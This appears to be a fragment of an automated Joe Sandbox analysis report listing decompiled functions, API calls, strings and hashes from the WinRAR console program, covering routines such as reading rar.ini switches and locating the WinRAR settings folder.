				if (_t66 >= 0) goto 0x50b26b02;
				 *((intOrPtr*)(_t109 + 2)) = r15w;
				if (_t59 != 0x52) goto 0x50b26b1a;
				if ((0x0000fffb & _t41 - _t59) != 0) goto 0x50b26b1a;
				 *((intOrPtr*)(_t109 + 4)) = r15w;
				_t43 = E00007FF67FF650B1657C(0xfffb, _t74, _t109 + 0x20, _t122, L"switches_%ls=", _t109, _t124);
				_t75 = _t109 + 0x20;
				if ( *((intOrPtr*)(_t75 + ((__rdi | 0xffffffff) + 1) * 2)) != r15w) goto 0x50b26b3b;
				if (E00007FF67FF650B5D648(_t43, 0xfffb, _t75, _t78, _t109 + 0x20, (__rdi | 0xffffffff) + 1) != 0) goto 0x50b26b64;
				E00007FF67FF650B2695C(0xfffb, _t59, __esi, _t78, _t106,  &(_t78[(__rdi | 0xffffffff) + 1]), _t106, _t109);
				E00007FF67FF650B5A464();
				if (_t75 != 0) goto 0x50b26a89;
				return E00007FF67FF650B69D10(E00007FF67FF650B115D0(_t112 + 0x40), 0xfffb,  *(_t109 + 0x60) ^ _t112);
			}























                                                                                                            0x7ff650b269f4
                                                                                                            0x7ff650b269f4
                                                                                                            0x7ff650b269f4
                                                                                                            0x7ff650b269f4
                                                                                                            0x7ff650b269f9
                                                                                                            0x7ff650b269fe
                                                                                                            0x7ff650b26a08
                                                                                                            0x7ff650b26a0d
                                                                                                            0x7ff650b26a14
                                                                                                            0x7ff650b26a1b
                                                                                                            0x7ff650b26a1e
                                                                                                            0x7ff650b26a22
                                                                                                            0x7ff650b26a2a
                                                                                                            0x7ff650b26a30
                                                                                                            0x7ff650b26a33
                                                                                                            0x7ff650b26a38
                                                                                                            0x7ff650b26a3d
                                                                                                            0x7ff650b26a42
                                                                                                            0x7ff650b26a47
                                                                                                            0x7ff650b26a4a
                                                                                                            0x7ff650b26a59
                                                                                                            0x7ff650b26a60
                                                                                                            0x7ff650b26a6b
                                                                                                            0x7ff650b26a76
                                                                                                            0x7ff650b26a7c
                                                                                                            0x7ff650b26a83
                                                                                                            0x7ff650b26a85
                                                                                                            0x7ff650b26a93
                                                                                                            0x7ff650b26a95
                                                                                                            0x7ff650b26aac
                                                                                                            0x7ff650b26aae
                                                                                                            0x7ff650b26ab5
                                                                                                            0x7ff650b26abe
                                                                                                            0x7ff650b26ac4
                                                                                                            0x7ff650b26ad1
                                                                                                            0x7ff650b26ada
                                                                                                            0x7ff650b26adf
                                                                                                            0x7ff650b26ae5
                                                                                                            0x7ff650b26aea
                                                                                                            0x7ff650b26aed
                                                                                                            0x7ff650b26af1
                                                                                                            0x7ff650b26af8
                                                                                                            0x7ff650b26afb
                                                                                                            0x7ff650b26afd
                                                                                                            0x7ff650b26b06
                                                                                                            0x7ff650b26b13
                                                                                                            0x7ff650b26b15
                                                                                                            0x7ff650b26b2e
                                                                                                            0x7ff650b26b33
                                                                                                            0x7ff650b26b43
                                                                                                            0x7ff650b26b56
                                                                                                            0x7ff650b26b5f
                                                                                                            0x7ff650b26b69
                                                                                                            0x7ff650b26b74
                                                                                                            0x7ff650b26bac

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: rar.ini$switches=$switches_%ls=
                                                                                                            • API String ID: 233258989-2235180025
                                                                                                            • Opcode ID: a527cf411dd4029bab3b12cc6a1eaf454ef74c803637d111b906410b828eaa81
                                                                                                            • Instruction ID: cd599101c7fffc8a6050c177080f3eeb16a2c17014f05028aa263dc437d04d34
                                                                                                            • Opcode Fuzzy Hash: a527cf411dd4029bab3b12cc6a1eaf454ef74c803637d111b906410b828eaa81
                                                                                                            • Instruction Fuzzy Hash: BF41B522A18683A5EB10DB21D8D11F923A0FF56784F484535EA4FA7BD9EF3ED505C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B441D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SHGetMalloc.SHELL32(00000000,00000800,00000800,00007FF650B44560,?,?,?,?,The system cannot find the file specified.,00000800,00000000,00007FF650B43977,?,?,?,00007FF650B44310), ref: 00007FF650B441F0
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,The system cannot find the file specified.,00000800,00000000,00007FF650B43977,?,?,?,00007FF650B44310), ref: 00007FF650B4420B
                                                                                                            • SHGetPathFromIDListW.SHELL32 ref: 00007FF650B4421D
                                                                                                              • Part of subcall function 00007FF650B33824: CreateDirectoryW.KERNEL32(00000000,00000800,?,00007FF650B4426B,?,?,?,?,The system cannot find the file specified.,00000800,00000000,00007FF650B43977,?,?,?,00007FF650B44310), ref: 00007FF650B3386C
                                                                                                              • Part of subcall function 00007FF650B33824: CreateDirectoryW.KERNEL32(00000000,00000800,?,00007FF650B4426B,?,?,?,?,The system cannot find the file specified.,00000800,00000000,00007FF650B43977,?,?,?,00007FF650B44310), ref: 00007FF650B338A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                            • String ID: WinRAR
                                                                                                            • API String ID: 977838571-3970807970
                                                                                                            • Opcode ID: 8014ff77d5e33d552f835d03c6761ec83ac47317a309cae688749f958ba7d059
                                                                                                            • Instruction ID: ac5c40ef2d1df7567945287023045ccde49b0ffb1a45c647e826f646457ca990
                                                                                                            • Opcode Fuzzy Hash: 8014ff77d5e33d552f835d03c6761ec83ac47317a309cae688749f958ba7d059
                                                                                                            • Instruction Fuzzy Hash: 11118116A08643A1EA109F26F4901BA6360AF8AFD0F1D5031EE8FB7765EF7DD5458700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B793FC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF650B73BC7,?,?,?,00007FF650B73B82,?,?,00000000,00007FF650B73EB1), ref: 00007FF650B79415
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF650B73BC7,?,?,?,00007FF650B73B82,?,?,00000000,00007FF650B73EB1), ref: 00007FF650B79477
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF650B73BC7,?,?,?,00007FF650B73B82,?,?,00000000,00007FF650B73EB1), ref: 00007FF650B794B1
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF650B73BC7,?,?,?,00007FF650B73B82,?,?,00000000,00007FF650B73EB1), ref: 00007FF650B794DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1557788787-0
                                                                                                            • Opcode ID: 114d2f0fe19b58eb78cf83bb38b35f12b57dedd541d562dd2286f12d9449a12c
                                                                                                            • Instruction ID: 0e4d2bc9c0341a89442b86690226d4a8f323cb85ee418905c9a786327a6d3096
                                                                                                            • Opcode Fuzzy Hash: 114d2f0fe19b58eb78cf83bb38b35f12b57dedd541d562dd2286f12d9449a12c
                                                                                                            • Instruction Fuzzy Hash: A8214F31E1875395E6708F12648412AA7A4BF56BD0F4C4134DE9FB3BA4DF7DE4528700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B48044 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E00007FF67FF650B48044(void* __ecx, void* __edx, void* __edi, void* __esp, void* __eflags, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, long long _a8, long long _a16, signed int _a24, long long _a32) {
				void* __rdi;
				void* _t23;
				intOrPtr _t42;
				signed int _t62;
				void* _t64;
				long long _t75;
				long long _t77;
				void* _t96;

				_t103 = __r8;
				_t99 = __rbp;
				_t97 = __rsi;
				_t76 = __rbx;
				_t75 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_t96 = __rdx;
				_t64 = __ecx;
				E00007FF67FF650B5ADC4(1, __rax, __rbx); // executed
				E00007FF67FF650B279E8(__rax); // executed
				E00007FF67FF650B2CC68(); // executed
				SetErrorMode(??); // executed
				GetModuleHandleW(??);
				r8d = 0;
				E00007FF67FF650B54470(1, __rax, _t76, 0x50ba79b0, __rax, __rsi, __r8); // executed
				E00007FF67FF650B53898(__rax, 0x50ba79c0, L"rar.lng"); // executed
				_a24 = _a24 & 0x00000000;
				_t23 = E00007FF67FF650B23ACC(0, _t76, _t96, _t97); // executed
				E00007FF67FF650B23C2C(_t23, _t23);
				E00007FF67FF650B69B58(_t75, 0x50ba79c0); // executed
				_a32 = _t75;
				if (_t75 == 0) goto 0x50b480de;
				E00007FF67FF650B23D0C(_t75); // executed
				_t77 = _t75;
				goto 0x50b480e0;
				r8d = _t64;
				E00007FF67FF650B24B2C(0xb910, 1, _t75, _t75, _t77, _t77, __rbp, _t103);
				if ( *((char*)(_t77 + 0x201c)) != 0) goto 0x50b48109;
				E00007FF67FF650B269F4(__edi, _t64, _t77, _t77, _t96, _t97, _t96); // executed
				E00007FF67FF650B24C60(_t75, _t77, _t77, L"rar.lng");
				r8d = _t64;
				E00007FF67FF650B24B2C(0xb910, 0,  *((char*)(_t77 + 0x201c)), _t75, _t77, _t77, _t99, _t103); // executed
				_t62 =  *((intOrPtr*)(_t77 + 0x8504));
				_a24 = _t62;
				if (_t62 == 0) goto 0x50b4812e;
				E00007FF67FF650B5CE70(E00007FF67FF650B5AF88(1, _t75),  *((intOrPtr*)(_t77 + 0x713c)));
				_t10 = _t77 + 0x6136; // 0x6136
				E00007FF67FF650B27A98( *((intOrPtr*)(_t77 + 0x4028)), _t10);
				if ( *((char*)(_t77 + 0x71ac)) != 0) goto 0x50b48161;
				if ( *((intOrPtr*)(_t77 + 0x7138)) == 3) goto 0x50b48161;
				goto 0x50b48163;
				 *0x50ba7ac1 = 1;
				E00007FF67FF650B24680( *((intOrPtr*)(_t77 + 0x713c)), _t77, _t77, L"rar.lng", _t96); // executed
				E00007FF67FF650B24DEC( *((intOrPtr*)(_t77 + 0x713c)), _t75, _t77, _t77, L"rar.lng", _t97, _t96); // executed
				E00007FF67FF650B1169C(1,  *((intOrPtr*)(_t77 + 0x7138)) - 3, _t77, _t77);
				E00007FF67FF650B38224(__esp, _t77, 0x50ba7a90, L"rar.lng", _t97);
				if (_a24 == 0) goto 0x50b481b8;
				if ( *0x50ba7ac2 != 0) goto 0x50b481b8;
				if (E00007FF67FF650B5AF88(0, _t75) != 0) goto 0x50b481b8;
				E00007FF67FF650B5AEBC(_a24);
				 *0x50ba7ac5 = 1;
				_t42 =  *0x50ba7ab8; // 0x9
				return _t42;
			}











                                                                                                            0x7ff650b48044
                                                                                                            0x7ff650b48044
                                                                                                            0x7ff650b48044
                                                                                                            0x7ff650b48044
                                                                                                            0x7ff650b48044
                                                                                                            0x7ff650b48044
                                                                                                            0x7ff650b48049
                                                                                                            0x7ff650b48053
                                                                                                            0x7ff650b48056
                                                                                                            0x7ff650b4805a
                                                                                                            0x7ff650b4805f
                                                                                                            0x7ff650b4806d
                                                                                                            0x7ff650b48077
                                                                                                            0x7ff650b4807f
                                                                                                            0x7ff650b48088
                                                                                                            0x7ff650b48092
                                                                                                            0x7ff650b480a5
                                                                                                            0x7ff650b480aa
                                                                                                            0x7ff650b480b1
                                                                                                            0x7ff650b480b8
                                                                                                            0x7ff650b480c2
                                                                                                            0x7ff650b480c7
                                                                                                            0x7ff650b480cf
                                                                                                            0x7ff650b480d4
                                                                                                            0x7ff650b480d9
                                                                                                            0x7ff650b480dc
                                                                                                            0x7ff650b480e3
                                                                                                            0x7ff650b480eb
                                                                                                            0x7ff650b480f7
                                                                                                            0x7ff650b480fc
                                                                                                            0x7ff650b48104
                                                                                                            0x7ff650b4810c
                                                                                                            0x7ff650b48114
                                                                                                            0x7ff650b48119
                                                                                                            0x7ff650b4811f
                                                                                                            0x7ff650b48125
                                                                                                            0x7ff650b48134
                                                                                                            0x7ff650b48139
                                                                                                            0x7ff650b48146
                                                                                                            0x7ff650b48152
                                                                                                            0x7ff650b4815b
                                                                                                            0x7ff650b4815f
                                                                                                            0x7ff650b48163
                                                                                                            0x7ff650b4816c
                                                                                                            0x7ff650b48174
                                                                                                            0x7ff650b48181
                                                                                                            0x7ff650b48194
                                                                                                            0x7ff650b4819b
                                                                                                            0x7ff650b481a4
                                                                                                            0x7ff650b481af
                                                                                                            0x7ff650b481b3
                                                                                                            0x7ff650b481b8
                                                                                                            0x7ff650b481bf
                                                                                                            0x7ff650b481d4

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                            • String ID: rar.lng
                                                                                                            • API String ID: 553376247-2410228151
                                                                                                            • Opcode ID: 7162e0ff2286f95bae702cffab27c06af35ca61082030e0b3eaa2615a03d3c6a
                                                                                                            • Instruction ID: 4653d533f6f576e459c5b55a4a74f6fbd17b534eb7b98dd939d5da574b3307bb
                                                                                                            • Opcode Fuzzy Hash: 7162e0ff2286f95bae702cffab27c06af35ca61082030e0b3eaa2615a03d3c6a
                                                                                                            • Instruction Fuzzy Hash: CF416B21E0C24375EA10AB24ACD52BD2392AF87B84F5C4435E94FFA7E6DE2FE5058750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B765EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleType
                                                                                                            • String ID: @
                                                                                                            • API String ID: 3000768030-2766056989
                                                                                                            • Opcode ID: cdfa0c5de8691599557f40ef6066aef973047fc0fed4167d092b28ed7670cf14
                                                                                                            • Instruction ID: fd9d95a4ea1a87b7384469500805f58741d459e06900ccb5c7064d3b6af17c7f
                                                                                                            • Opcode Fuzzy Hash: cdfa0c5de8691599557f40ef6066aef973047fc0fed4167d092b28ed7670cf14
                                                                                                            • Instruction Fuzzy Hash: 3121B622B08B4351EB648B25D4D01792655EB46B74F6C1335DABFA77E4DE3EE885C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6B168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF650B2CDD1), ref: 00007FF650B6B1AC
                                                                                                            • RaiseException.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF650B2CDD1), ref: 00007FF650B6B1F2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                            • Opcode ID: 875c50bbed08b4d4063dd05ec10e6a30e1545445dbeaea0068a41bf78fad4654
                                                                                                            • Instruction ID: 46acd659648b5656b49207ae29c5d4b0cf4185d68cea3b5bd8250af1bfc17449
                                                                                                            • Opcode Fuzzy Hash: 875c50bbed08b4d4063dd05ec10e6a30e1545445dbeaea0068a41bf78fad4654
                                                                                                            • Instruction Fuzzy Hash: 97113D32628B4692EB518B15E580269B7B1FF89B84F1C4230DF8E67764DF3DD5518B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6A6EC Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E00007FF67FF650B6A6EC(void* __edx, void* __edi, void* __esp, void* __eflags, intOrPtr* __rax, long long __rbx, long long __rsi, void* __rbp, void* __r8, long long _a8, long long _a16) {
				char _v24;
				void* __rdi;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t24;
				void* _t28;
				intOrPtr _t36;
				intOrPtr* _t59;
				intOrPtr* _t60;
				void* _t74;
				void* _t78;
				void* _t82;

				_t82 = __r8;
				_t78 = __rbp;
				_t76 = __rsi;
				_t61 = __rbx;
				_t59 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_t9 = E00007FF67FF650B6A17C(1); // executed
				if (_t9 == 0) goto 0x50b6a843;
				sil = 0;
				_v24 = sil;
				_t10 = E00007FF67FF650B6A140();
				_t36 =  *0x50bb3800; // 0x2
				if (_t36 == 1) goto 0x50b6a84e;
				if (_t36 != 0) goto 0x50b6a779;
				 *0x50bb3800 = 1;
				_t11 = E00007FF67FF650B74608(__rbx, 0x50b805d0, 0x50b80610, __rsi); // executed
				if (_t11 == 0) goto 0x50b6a75a;
				goto 0x50b6a833;
				E00007FF67FF650B74590(_t61, 0x50b80570, 0x50b805c8, _t74, _t76); // executed
				 *0x50bb3800 = 2;
				goto 0x50b6a781;
				sil = 1;
				_v24 = sil;
				E00007FF67FF650B6AE10(E00007FF67FF650B6A2EC(_t10, 0x50b805c8));
				if ( *_t59 == 0) goto 0x50b6a7b4;
				if (E00007FF67FF650B6A254(_t59, _t59) == 0) goto 0x50b6a7b4;
				r8d = 0;
				_t5 = _t82 + 2; // 0x2
				_t60 =  *_t59;
				E00007FF67FF650B6AE18( *0x50b80550());
				if ( *_t60 == 0) goto 0x50b6a7d6;
				if (E00007FF67FF650B6A254(_t60, _t60) == 0) goto 0x50b6a7d6;
				_t70 =  *_t60;
				E00007FF67FF650B727C4(_t60,  *_t60);
				E00007FF67FF650B74688(E00007FF67FF650B74690(E00007FF67FF650B73E9C()));
				_t83 = _t60;
				_t73 =  *_t60;
				_t24 = E00007FF67FF650B48044( *_t60, _t5, __edi, __esp, E00007FF67FF650B6A254(_t60, _t60), _t60,  *_t60,  *_t60,  *_t60, _t76, _t78, _t60); // executed
				if (E00007FF67FF650B6AC54(_t60) == 0) goto 0x50b6a858;
				if (sil != 0) goto 0x50b6a80d;
				E00007FF67FF650B727A8(_t60,  *_t60,  *_t60, _t60);
				E00007FF67FF650B6A310(1, 0);
				_t28 = _t24;
				if (E00007FF67FF650B6AC54(_t60) == 0) goto 0x50b6a860;
				if (_v24 != 0) goto 0x50b6a831;
				E00007FF67FF650B72798(_t60, _t70, _t73, _t83);
				return _t28;
			}
















                                                                                                            0x7ff650b6a6ec
                                                                                                            0x7ff650b6a6ec
                                                                                                            0x7ff650b6a6ec
                                                                                                            0x7ff650b6a6ec
                                                                                                            0x7ff650b6a6ec
                                                                                                            0x7ff650b6a6ec
                                                                                                            0x7ff650b6a6f1
                                                                                                            0x7ff650b6a700
                                                                                                            0x7ff650b6a707
                                                                                                            0x7ff650b6a70d
                                                                                                            0x7ff650b6a710
                                                                                                            0x7ff650b6a715
                                                                                                            0x7ff650b6a71c
                                                                                                            0x7ff650b6a725
                                                                                                            0x7ff650b6a72d
                                                                                                            0x7ff650b6a72f
                                                                                                            0x7ff650b6a747
                                                                                                            0x7ff650b6a74e
                                                                                                            0x7ff650b6a755
                                                                                                            0x7ff650b6a768
                                                                                                            0x7ff650b6a76d
                                                                                                            0x7ff650b6a777
                                                                                                            0x7ff650b6a779
                                                                                                            0x7ff650b6a77c
                                                                                                            0x7ff650b6a788
                                                                                                            0x7ff650b6a794
                                                                                                            0x7ff650b6a7a0
                                                                                                            0x7ff650b6a7a2
                                                                                                            0x7ff650b6a7a5
                                                                                                            0x7ff650b6a7ab
                                                                                                            0x7ff650b6a7b4
                                                                                                            0x7ff650b6a7c0
                                                                                                            0x7ff650b6a7cc
                                                                                                            0x7ff650b6a7ce
                                                                                                            0x7ff650b6a7d1
                                                                                                            0x7ff650b6a7e6
                                                                                                            0x7ff650b6a7eb
                                                                                                            0x7ff650b6a7ee
                                                                                                            0x7ff650b6a7f3
                                                                                                            0x7ff650b6a801
                                                                                                            0x7ff650b6a806
                                                                                                            0x7ff650b6a808
                                                                                                            0x7ff650b6a811
                                                                                                            0x7ff650b6a816
                                                                                                            0x7ff650b6a823
                                                                                                            0x7ff650b6a82a
                                                                                                            0x7ff650b6a82c
                                                                                                            0x7ff650b6a842

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
